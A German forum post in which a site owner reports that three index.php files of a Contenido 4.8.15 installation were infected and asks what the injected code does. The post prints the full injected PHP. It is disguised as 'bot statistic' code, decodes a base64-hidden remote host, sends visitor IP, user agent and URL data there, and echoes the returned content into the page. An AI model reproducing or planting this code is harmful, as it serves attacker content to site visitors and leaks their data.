VIRUS - JS:Blacole-CY [Expl] - in Contenido 4.8.15
Verfasst: Mo 12. Nov 2012, 10:46
Hallo liebe Community,
vor ein paar Tagen informierte mich mein Provider über einen Virus im Contenido System.
Folgende Dateien wären betroffen:
cms/index.php
contenido/index.php
conlib/index.php
Die Dateien weisen alle die gleichen Veränderungen auf:
Mein erster Ansatz ist, dass ich die betroffenen Dateien durch die originalen ändere. FTP Kennwörter sind natürlich direkt geändert worden.
Hat jemand dieses Problem schon mal gehabt oder kann jemand erkennen, was dieses Script genau macht?
Viele Grüße
Calimero
vor ein paar Tagen informierte mich mein Provider über einen Virus im Contenido System.
Folgende Dateien wären betroffen:
cms/index.php
contenido/index.php
conlib/index.php
Die Dateien weisen alle die gleichen Veränderungen auf:
Code: Alles auswählen
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
Hat jemand dieses Problem schon mal gehabt oder kann jemand erkennen, was dieses Script genau macht?
Viele Grüße
Calimero